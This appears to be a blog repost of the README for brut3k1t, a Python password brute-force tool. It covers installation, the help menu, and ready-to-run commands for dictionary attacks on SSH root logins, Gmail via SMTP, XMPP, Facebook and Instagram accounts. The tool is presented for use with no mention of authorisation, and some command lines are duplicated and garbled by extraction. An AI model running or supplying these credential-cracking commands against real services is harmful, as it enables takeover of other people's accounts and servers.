IMCAFS

Home

side brute

Posted by barello at 2020-04-15
all

Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services. 1. Introduction brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are:

ssh ftp smtp XMPP instagram facebook

There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram). 2. Installation Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have it. argparse - utilized for parsing command line arguments paramiko - utilized for working with SSH connections and authentication ftplib - utilized for working with FTP connections and authentication smtplib - utilized for working with SMTP (email) connections and authentication fbchat - utilized for connecting with Facebook selenium - utilized for web scraping, which is used with Instagram (and later Twitter) xmppy - utiized for XMPP connections ...and more within the future! Downloading is simple. Simply git clone .

git clone git clone https://github.com/ex0dus-0x/brut3k1t

Change to directory:

cd /path/to/brut3k1t

3. Usage Utilizing brut3k1t is a little more complicated than just running a Python file. Typing python brut3k1t -h shows the help menu:

python brut3k1t -h usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS] [-p PORT] [-d DELAY] Server-side bruteforce module written in Python optional arguments: -h, --help show this help message and exit -a ADDRESS, --address ADDRESS Provide host address for specified service. Required for certain protocols -p PORT, --port PORT Provide port for host address for specified service. If not specified, will be automatically set -d DELAY, --delay DELAY Provide the number of seconds the program delays as each password is tried required arguments: -s SERVICE, --service SERVICE Provide a service being attacked. Several protocols and services are supported -u USERNAME, --username USERNAME Provide a valid username for service/protocol being executed -w PASSWORD, --wordlist PASSWORD Provide a wordlist or directory to a wordlist

Examples of usage: Cracking SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist.

192.168.1.3 root wordlist.txt python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

The program will automatically set the port to 22, but if it is different, specify with -p flag. Cracking email [email protected] with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server's address. For e.g Gmail = smtp.gmail.com . You can research this using Google.

-p [email protected] wordlist.txt 25 smtp.gmail.com python brut3k1t.py -s smtp -a smtp.gmail.com -u [email protected] -w wordlist.txt -p 25 -d 3

Cracking XMPP [email protected] with wordlist.txt on default port 5222 . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case creep.im .

[email protected] wordlist.txt 5222 creep.im python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay

test wordlist.txt python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

## KEY NOTES TO REMEMBER If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :)

-p -d -a